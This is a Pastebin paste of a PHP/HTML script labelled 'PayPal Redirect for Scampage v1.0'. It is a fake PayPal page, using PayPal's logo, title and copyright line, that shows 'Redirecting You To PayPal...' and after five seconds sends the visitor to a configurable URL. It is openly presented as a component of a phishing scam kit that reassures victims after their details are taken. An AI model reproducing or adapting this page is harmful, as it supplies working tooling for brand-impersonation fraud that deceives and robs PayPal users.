Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $url = "https://google.com"; //use http or https
- # Created by AlexaMP
- # PayPal Redirect for Scampage v1.0
- # Auto Redirecting in 5 seconds
- # Already Manual Redirecting
- # Do not sell this script
- # You can share, but not for sale
- # Thanks For Using Us!
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <link rel="shortcut icon" href="https://lh3.googleusercontent.com/proxy/e4r_BWtC_X_p8ArY8nFzUWJgX4OWL22kh446kD0ZJmIin67_1fKJEy5pLyhlCXYBlOU4hkg1Yagh9cr135wMdYFsVTRhbiv1AaXIK1rf">
- <title>PayPal</title>
- <meta charset="utf-8">
- <style type="text/css">
- .login {
- margin: 250px auto;
- width: 400px;
- padding: 20px;
- border-radius:3px;
- border: 1px solid rgb(242, 242, 242);
- background: rgb(242, 242, 242);
- }
- </style>
- </head>
- <body>
- <div class="login">
- <center>
- <img src='https://lh3.googleusercontent.com/vIJ7bv0rBwc3IdHaocUXloyLhJR6_vGhpwQGpXMR3ZD8dK_OnXpzPgb2FSpXnol-QipG' width='130px'><br/><br/>
- <font size="consolas" size="5" color="gray">
- <div id="pesan"></div>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
- <script>
- var url = "<?php echo "$url"; ?>";
- var count = 5;
- function countDown() {
- if (count > 0) {
- count--;
- var waktu = count + 1;
- $('#pesan').html('Redirecting You To PayPal...');
- setTimeout("countDown()", 1000);
- } else {
- window.location.href = url;
- }
- }
- countDown();
- </script>
- </font>
- <br/><br/><br/>
- <font size="1" face="calibri" color="gray">
- Not Redirected?<br/>
- <a href="<?php echo "$url"; ?>">
- <button style="width:100%;padding:10px;color:white;background:#0080FF;border:1px solid #0080FF;border-radius:3px;font-family:consolas;">
- Go To PayPal
- </button>
- </a>
- </font>
- </center><br/><font size="1">
- Copyright 1999-2017 PayPal. All rights reserved.<br/>PayPal is located at 2211 N. First St., San Jose, CA 95131.</font>
- </div> </body> </html>
Add Comment
Please, Sign In to add comment